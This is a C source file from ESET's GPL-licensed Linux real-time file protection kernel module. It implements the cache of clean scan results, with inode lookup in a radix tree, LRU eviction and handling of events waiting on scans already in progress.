/* Current file: /var/opt/eset/efs/eventd/eset_rtp/ertp_cache.c */
/*
 * eset_rtp (ESET Real-time file system protection module)
 * Copyright (C) 1992-2021 ESET, spol. s r.o.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 * In case of any questions, you can contact us at ESET, spol. s r.o., Einsteinova 24, 851 01 Bratislava, Slovakia.
 */

#include "ertp_cache.h"
#include "ertp_scan_mask.h"
#include "ertp.h"

/* the cache stores only clean results; infected files are sent to the scanner
   on every event (the single optimization is that parallel scans of the same
   file are avoided) */
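/*
 * Illustrative caller flow (a sketch only, kept under #if 0; the real event
 * dispatch lives elsewhere in the module and the helper name below is
 * hypothetical). It shows how the cache API defined in this file is meant to
 * be combined: serve clean results from the cache, park events behind an
 * already-running scan of the same file, and fall back to a fresh scan
 * otherwise.
 */
#if 0
static int ertp_handle_event_sketch(struct file *file, struct ertp_event *event)
{
	const struct inode *inode = file->f_dentry->d_inode;
	int cached = ertp_cache_check(file, event->type);

	if (cached == ERTP_ALLOW)
		return ERTP_ALLOW; /* clean result served directly from the cache */

	if (cached == ERTP_SCAN_IN_PROGRESS && ertp_cache_add_event(event))
		return 0; /* parked on waiting_events; ertp_cache_update() will finish it */

	/* ERTP_UNKNOWN or ERTP_MODIFIED: (re)create the record and scan */
	if (ertp_cache_insert_new_file(inode, event) != 0)
		return -1; /* could not cache; the caller would scan without caching */
	ertp_cache_set_scan_is_running(inode, event);
	/* ... hand the event to the user-space scanner; its reply comes back
	 * through ertp_cache_update(event), which stores the result and
	 * unblocks any waiting events ... */
	return 0;
}
#endif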

struct ertp_inode_data {
	struct list_head    time_list;  /* entry in the inode data list, sorted by last usage time */
	const struct inode *inode;      /* ID */
	unsigned long       i_ino;      /* inode number */
	dev_t               s_dev;      /* internal device number */
	int                 result;     /* last result from scanner: ERTP_ALLOW or ERTP_UNKNOWN - only clean results are cached */
	uint32_t            scan_mask;  /* bit mask of applied scan settings for this record */

#if LINUX_VERSION_CODE < KERNEL_VERSION(4,18,0)
	struct timespec   cached_ctime; /* last change time of cached data */
	struct timespec   running_scan_ctime; /* last change time of currently scanned file */
#else
	struct timespec64 cached_ctime; /* last change time of cached data */
	struct timespec64 running_scan_ctime; /* last change time of currently scanned file */
#endif

	atomic_t           count; /* refcount */
	spinlock_t         lock; /* lock protecting data */
	struct ertp_event *scan_in_progress; /* non-NULL if this file is currently being scanned and eset_rtp is waiting for the response */
	struct list_head   waiting_events; /* head of the list of events waiting for this result */
};

/* slab cache from which inode data entries are allocated */
static struct kmem_cache *ertp_scan_cache = NULL;

/* radix tree for quick lookup */
static RADIX_TREE(ertp_scan_radix_tree, GFP_ATOMIC);
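/* the tree is keyed by the inode's pointer value, cast to long; see the
   (long)inode casts in the lookup/insert/delete calls below */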

/* spinlock protecting radix tree */
static DEFINE_SPINLOCK(ertp_scan_radix_tree_lock);

struct ertp_scan_time_list_t {
	struct list_head root;
	spinlock_t lock;
	size_t size;
	size_t max_size;
};

/* list of inode data, sorted by last access time */
static struct ertp_scan_time_list_t ertp_scan_time_list = {
	.root = LIST_HEAD_INIT(ertp_scan_time_list.root),
	.lock = __SPIN_LOCK_UNLOCKED(ertp_scan_time_list.lock),
	.size = 0,
	.max_size = 100000,
};
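/*
 * Worked example of the eviction policy: with the default max_size of 100000,
 * the insert that pushes size to 100001 triggers ertp_cache_optimize(), which
 * evicts the 10000 least recently used records (size / 10) from the head of
 * the time list.
 */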

static void ertp_cache_set_scan_is_finished_internal(struct ertp_inode_data *data, int result, uint32_t scan_mask)
{
	struct ertp_event *attached_event;
	struct ertp_event *event;
	struct ertp_event *tmp;
	LIST_HEAD(finished_events_list);

	if (!data)
		return;

	spin_lock(&data->lock);
	attached_event = data->scan_in_progress;
	data->scan_in_progress = NULL;
	/* update only the result (only clean files without any flags are cached) and the scan mask; ctime, inode, etc. keep the values from the moment the scan began */
	data->result = (result & ERTP_DO_NOT_CACHE || result & ERTP_DENY) ? ERTP_UNKNOWN : result;
	data->scan_mask = scan_mask;

	list_for_each_entry_safe(event, tmp, &data->waiting_events, cache_waiting_list) {
		list_move_tail(&event->cache_waiting_list, &finished_events_list);
	}
	spin_unlock(&data->lock);

	ertp_event_put(attached_event);
	list_for_each_entry_safe(event, tmp, &finished_events_list, cache_waiting_list) {
		list_del_init(&event->cache_waiting_list);
		event->result = result; // use real result, e.g. ERTP_DENY for infected files
		ertp_event_done(event);
		ertp_pr_debug("event for inode: %lu unblocked via cache update", data->i_ino);
		ertp_event_put(event);
	}
}

static void ertp_inode_data_update_after_scan(struct ertp_inode_data *data)
{
	spin_lock(&ertp_scan_time_list.lock);
	if (!list_empty(&data->time_list)) {
		/* move data to the end of the time cache list */
		list_move_tail(&data->time_list, &ertp_scan_time_list.root);
	}
	spin_unlock(&ertp_scan_time_list.lock);
}

static inline void ertp_inode_data_update_before_scan_unlocked(struct ertp_inode_data *data, const struct ertp_event *event)
{
	const struct inode *inode = event->f_path_dentry->d_inode;

	data->i_ino = inode->i_ino;
	data->s_dev = inode->i_sb->s_dev;
	data->result = ERTP_UNKNOWN;
	data->cached_ctime = inode->i_ctime;
	data->scan_mask = event->scan_mask;
}

static inline void ertp_inode_data_update_before_scan(struct ertp_inode_data *data, const struct ertp_event *event)
{
	spin_lock(&data->lock);
	ertp_inode_data_update_before_scan_unlocked(data, event);
	spin_unlock(&data->lock);
}

struct ertp_inode_data *ertp_inode_data_new(const struct ertp_event *event)
{
	struct ertp_inode_data *data;
	const struct inode *inode = event->f_path_dentry->d_inode;

	if (!inode)
		return ERR_PTR(-EINVAL);

	data = kmem_cache_zalloc(ertp_scan_cache, GFP_KERNEL);
	if (!data)
		return ERR_PTR(-ENOMEM);

	INIT_LIST_HEAD(&data->time_list);
	data->inode = inode;
	ertp_inode_data_update_before_scan_unlocked(data, event);
	atomic_set(&data->count, 1);
	spin_lock_init(&data->lock);
	INIT_LIST_HEAD(&data->waiting_events);
	data->scan_in_progress = NULL;

	return data;
}

void ertp_inode_data_ref(struct ertp_inode_data *data)
{
	atomic_inc(&data->count);
}

void ertp_inode_data_unref(struct ertp_inode_data *data)
{
	if (!data)
		return;

	if (atomic_dec_and_test(&data->count)) {
		ertp_cache_set_scan_is_finished_internal(data, ERTP_UNKNOWN, 0);
		kmem_cache_free(ertp_scan_cache, data);
	}
}

static struct ertp_inode_data *ertp_cache_lookup_inode(const struct inode *inode)
{
	struct ertp_inode_data *data;

	if (!inode)
		return NULL;

	spin_lock(&ertp_scan_radix_tree_lock);
	data = radix_tree_lookup(&ertp_scan_radix_tree, (long)inode);
	if (data)
		ertp_inode_data_ref(data);
	spin_unlock(&ertp_scan_radix_tree_lock);

	return data;
}

bool ertp_cache_add_event(struct ertp_event *event)
{
	bool ret = false;
	struct ertp_inode_data *data = ertp_cache_lookup_inode(event->f_path_dentry->d_inode);

	if (!data) {
		/* data is NULL here; take the inode number from the event instead */
		ertp_pr_debug("cache record for inode: %lu not found",
			event->f_path_dentry->d_inode ? event->f_path_dentry->d_inode->i_ino : 0UL);
		return false;
	}

	spin_lock(&data->lock);
	if (data->scan_in_progress) {
		ertp_event_get(event);
		list_add_tail(&event->cache_waiting_list, &data->waiting_events);
		ret = true;
		ertp_pr_debug("event for inode: %lu added to cache data and waiting for update", data->i_ino);
	}
	spin_unlock(&data->lock);

	ertp_inode_data_unref(data);
	return ret;
}

void ertp_cache_set_scan_is_running(const struct inode *inode, struct ertp_event *scan_in_progress)
{
	struct ertp_inode_data *data = ertp_cache_lookup_inode(inode);
	if (!data)
		return;
	if (!scan_in_progress) {
		/* drop the reference taken by ertp_cache_lookup_inode() */
		ertp_inode_data_unref(data);
		return;
	}

	spin_lock(&data->lock);
	if (!data->scan_in_progress) {
		data->running_scan_ctime = scan_in_progress->f_path_dentry->d_inode->i_ctime;
		data->scan_in_progress = ertp_event_get(scan_in_progress);
	}
	spin_unlock(&data->lock);

	ertp_inode_data_unref(data);
}

void ertp_cache_set_scan_is_finished(const struct inode *inode, int result, uint32_t scan_mask)
{
	struct ertp_inode_data *data = ertp_cache_lookup_inode(inode);
	ertp_cache_set_scan_is_finished_internal(data, result, scan_mask);
	ertp_inode_data_unref(data);
}

/* remove the oldest 10 percent of the cache */
static void ertp_cache_optimize(void)
{
	struct ertp_inode_data *data;
	struct ertp_inode_data *tmp;
	LIST_HEAD(removed_data_list);
	size_t i = 0;

	// move 10% of entries from time list to a temporary one
	spin_lock(&ertp_scan_time_list.lock);
	for (; i < ertp_scan_time_list.size / 10; ++i) {
		struct ertp_inode_data *oldest_data = container_of(ertp_scan_time_list.root.next,
			struct ertp_inode_data, time_list);
		list_move_tail(&oldest_data->time_list, &removed_data_list);
	}

	ertp_pr_debug("Max cache size %zu reached removing %zu oldest records", ertp_scan_time_list.max_size, i);
	ertp_scan_time_list.size -= i;
	spin_unlock(&ertp_scan_time_list.lock);

	// remove them from radix tree
	spin_lock(&ertp_scan_radix_tree_lock);
	list_for_each_entry(data, &removed_data_list, time_list) {
		tmp = radix_tree_delete(&ertp_scan_radix_tree, (long)data->inode);
		if (tmp) {
			ertp_inode_data_unref(tmp); // paired with ertp_inode_data_ref() in ertp_cache_insert()
		}
	}
	spin_unlock(&ertp_scan_radix_tree_lock);

	// release all (no longer used) entries
	i = 0;
	list_for_each_entry_safe(data, tmp, &removed_data_list, time_list) {
		ertp_pr_debug("deleting id: %lu, on addr: %p, with refcount: %d", (unsigned long)i++, data, atomic_read(&data->count));
		list_del_init(&data->time_list);
		ertp_inode_data_unref(data); // paired with ertp_inode_data_ref() in ertp_cache_insert_data_to_time_list()
	}
}

static void ertp_cache_insert_data_to_time_list(struct ertp_inode_data *data)
{
	bool max_size_exceeded;
	ertp_inode_data_ref(data);
	spin_lock(&ertp_scan_time_list.lock);
	list_add_tail(&data->time_list, &ertp_scan_time_list.root);
	++ertp_scan_time_list.size;
	max_size_exceeded = ertp_scan_time_list.size > ertp_scan_time_list.max_size;
	spin_unlock(&ertp_scan_time_list.lock);

	if (max_size_exceeded) {
		ertp_cache_optimize();
	}
}

static void ertp_cache_remove_data_from_time_list(struct ertp_inode_data *data)
{
	bool removed = false;
	spin_lock(&ertp_scan_time_list.lock);
	if (!list_empty(&data->time_list)) {
		list_del_init(&data->time_list);
		--ertp_scan_time_list.size;
		removed = true;
	}
	spin_unlock(&ertp_scan_time_list.lock);

	if (removed) {
		ertp_inode_data_unref(data); // paired with ertp_inode_data_ref() in ertp_cache_insert_data_to_time_list()
	}
}

int ertp_cache_insert(struct ertp_inode_data *data)
{
	int err = radix_tree_preload(GFP_KERNEL);
	if (err)
		return err; // -ENOMEM

	ertp_inode_data_ref(data);
	spin_lock(&ertp_scan_radix_tree_lock);
	{
		err = radix_tree_insert(&ertp_scan_radix_tree,
			(long)data->inode, data);
	}
	spin_unlock(&ertp_scan_radix_tree_lock);

	if (err) {
		// e.g. -EEXIST
		ertp_inode_data_unref(data);
		ertp_pr_debug("Cannot insert data to cache, inode %lu, device number %u, error %d",
			data->inode->i_ino, new_encode_dev(data->inode->i_sb->s_dev), err);
	}

	radix_tree_preload_end();

	if (!err)
		ertp_cache_insert_data_to_time_list(data);

	return err;
}

/* remove @inode from cache and release a reference */
void ertp_cache_remove_inode(const struct inode *inode)
{
	struct ertp_inode_data *data;
	if (unlikely(!inode)) {
		ertp_pr_debug("invalid inode!");
		return;
	}

	spin_lock(&ertp_scan_radix_tree_lock);
	data = radix_tree_delete(&ertp_scan_radix_tree, (long)inode);
	spin_unlock(&ertp_scan_radix_tree_lock);

	if (data) {
		ertp_pr_debug("data: %p removed from cache, refcount: %d", data, atomic_read(&data->count));
		// call (the last) ertp_inode_data_unref outside lock
		ertp_cache_remove_data_from_time_list(data);
		ertp_inode_data_unref(data); // paired with ertp_inode_data_ref() in ertp_cache_insert()
	}
}

static inline bool ertp_scan_mask_usable(uint32_t scan_mask_of_running_scan, int type_of_new_event)
{
	uint32_t wanted_mask = ertp_scan_mask_get(type_of_new_event);
	return (scan_mask_of_running_scan & wanted_mask) == wanted_mask;
}
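/*
 * Worked example: if the running scan was started with scan_mask 0b0111 and a
 * new event of a type that wants 0b0011 arrives, 0b0111 & 0b0011 == 0b0011, so
 * the running scan covers the request and its result can be reused. A running
 * mask of 0b0001 would not cover 0b0011 and would force a new scan.
 */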

/* return true if the result of the scan currently in progress can be used for this event */
static inline bool ertp_cache_same_scan_in_progress(const struct inode *inode, const struct ertp_inode_data *data, int type)
{
	if (data->scan_in_progress && (data->scan_in_progress->ino == inode->i_ino)
	    && (data->scan_in_progress->dev == new_encode_dev(inode->i_sb->s_dev))
	    && (data->running_scan_ctime.tv_sec == inode->i_ctime.tv_sec)
	    && (data->running_scan_ctime.tv_nsec == inode->i_ctime.tv_nsec)
	    && ertp_scan_mask_usable(data->scan_in_progress->scan_mask, type)) {
		return true;
	}

	return false;
}

int ertp_cache_get_result(const struct inode *inode, struct ertp_inode_data *data, int type)
{
	int result = ERTP_UNKNOWN;

	spin_lock(&data->lock);

	/* inode mismatch - this is not the cached file! */
	if ((data->i_ino != inode->i_ino) || (data->s_dev != inode->i_sb->s_dev)) {
		goto exit;
	}

	/* result of currently scanned file can be used */
	if (ertp_cache_same_scan_in_progress(inode, data, type)) {
		result = ERTP_SCAN_IN_PROGRESS;
		goto exit;
	}

	/* the file has changed since the result was cached */
	if ((data->cached_ctime.tv_sec != inode->i_ctime.tv_sec)
			|| (data->cached_ctime.tv_nsec != inode->i_ctime.tv_nsec)) {
		result = ERTP_MODIFIED;
		goto exit;
	}

	/* cached result has weaker scan settings mask */
	if (!ertp_scan_mask_usable(data->scan_mask, type)) {
		goto exit;
	}

	result = data->result;

exit:
	spin_unlock(&data->lock);
	return result;
}
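/*
 * Summary of ertp_cache_get_result() outcomes: ERTP_SCAN_IN_PROGRESS when a
 * usable scan of the same unchanged file is already running, ERTP_MODIFIED
 * when the ctime differs from the cached one, the cached result (ERTP_ALLOW or
 * ERTP_UNKNOWN) on a full match, and ERTP_UNKNOWN on an inode/device mismatch
 * or when the cached scan mask is weaker than the requested one.
 */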

void ertp_cache_clear(void)
{
	struct ertp_inode_data *data;
	struct ertp_inode_data *tmp;
	LIST_HEAD(removed_data_list);
#ifdef ERTP_DEBUG
	int i = 0;
#endif
	// move all entries from time list to a temporary one
	spin_lock(&ertp_scan_time_list.lock);
	list_for_each_entry_safe(data, tmp, &ertp_scan_time_list.root, time_list) {
		list_move_tail(&data->time_list, &removed_data_list);
	}
	ertp_scan_time_list.size = 0;
	spin_unlock(&ertp_scan_time_list.lock);

	// remove them from radix tree
	spin_lock(&ertp_scan_radix_tree_lock);
	list_for_each_entry(data, &removed_data_list, time_list) {
		tmp = radix_tree_delete(&ertp_scan_radix_tree, (long)data->inode);
		if (tmp) {
			ertp_inode_data_unref(tmp); // paired with ertp_inode_data_ref() in ertp_cache_insert()
		}
	}
	spin_unlock(&ertp_scan_radix_tree_lock);

	// release all (no longer used) entries
	list_for_each_entry_safe(data, tmp, &removed_data_list, time_list) {
		ertp_pr_debug("deleting id: %d, on addr: %p, with refcount: %d", i++, data, atomic_read(&data->count));
		list_del_init(&data->time_list);
		ertp_inode_data_unref(data); // paired with ertp_inode_data_ref() in ertp_cache_insert_data_to_time_list()
	}
}

void ertp_cache_set_size(size_t max_size)
{
	// clear old cached data
	ertp_cache_clear();
	spin_lock(&ertp_scan_time_list.lock);
	ertp_scan_time_list.max_size = max_size;
	spin_unlock(&ertp_scan_time_list.lock);
}

int ertp_cache_init(void)
{
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22)
	ertp_scan_cache = kmem_cache_create("ertp_scan_cache",
		sizeof(struct ertp_inode_data),
		0, SLAB_RECLAIM_ACCOUNT, NULL, NULL);
#else
	ertp_scan_cache = kmem_cache_create("ertp_scan_cache",
		sizeof(struct ertp_inode_data),
		0, SLAB_RECLAIM_ACCOUNT, NULL);
#endif

	if (!ertp_scan_cache)
		return -ENOMEM;

	return 0;
}

void ertp_cache_deinit(void)
{
	ertp_cache_clear();
	kmem_cache_destroy(ertp_scan_cache);
}

void ertp_cache_update(const struct ertp_event *event)
{
	const struct inode *inode = event->f_path_dentry->d_inode;
	struct ertp_inode_data *data;

	if (!inode)
		return;

	data = ertp_cache_lookup_inode(inode);

	/* all scanned files should already have records in the cache, but the cache could have been reset from user space in the meantime */
	if (!data) {
		ertp_pr_debug("No record in cache for event id %d, type %d, inode %lu, device number %u", event->id, event->type, inode->i_ino, new_encode_dev(inode->i_sb->s_dev));
		return;
	}

	ertp_cache_set_scan_is_finished_internal(data, event->result, event->scan_mask);
	ertp_inode_data_update_after_scan(data);
	ertp_inode_data_unref(data);

#ifdef ERTP_CACHE_DEBUG
	{
		static char BUF[256];
		const char *file_name = simple_dname(event->f_path_dentry, BUF, sizeof(BUF));
		if (!IS_ERR(file_name)) {
			ertp_pr_debug("event added to cache: id: %d, type: %s, file: %s, result:%s",
				event->id,
				(event->type == ERTP_OPEN) ? "Open" : "Close",
				file_name,
				(event->result == ERTP_ALLOW) ? "Allow" : "Deny"
			);
		}
	}
#endif
}

int ertp_cache_check(const struct file *file, int type)
{
	int result = ERTP_UNKNOWN;
	const struct inode *inode = file->f_dentry->d_inode;
	struct ertp_inode_data *data = ertp_cache_lookup_inode(inode);

	if (!data)
		return ERTP_UNKNOWN;

	result = ertp_cache_get_result(inode, data, type);

	ertp_inode_data_unref(data);

#ifdef ERTP_CACHE_DEBUG
	{
		static char BUF[256];
		const char *file_name = simple_dname(file->f_dentry, BUF, sizeof(BUF));
		if (!IS_ERR(file_name)) {
			if ((result == ERTP_ALLOW) || (result == ERTP_DENY)) {
				ertp_pr_debug("using cached result: %s for event: %s, file: %s",
					(result == ERTP_ALLOW) ? "Allow" : "Deny",
					(type == ERTP_OPEN) ? "Open" : "Close",
					file_name
				);
			} else {
				ertp_pr_debug("cache result (%d) -> need to scan event: %s, file: %s",
					result,
					(type == ERTP_OPEN) ? "Open" : "Close",
					file_name
				);
			}
		}
	}
#endif
	return result;
}

int ertp_cache_insert_new_file(const struct inode *inode, const struct ertp_event *event)
{
	struct ertp_inode_data *data = ertp_cache_lookup_inode(inode);
	if (data) {
		ertp_inode_data_update_before_scan(data, event);
	} else {
		/* not yet in cache */
		data = ertp_inode_data_new(event);
		if (IS_ERR(data)) {
			return -1;
		}
		ertp_cache_insert(data);
	}
	ertp_inode_data_unref(data);
	return 0;
}
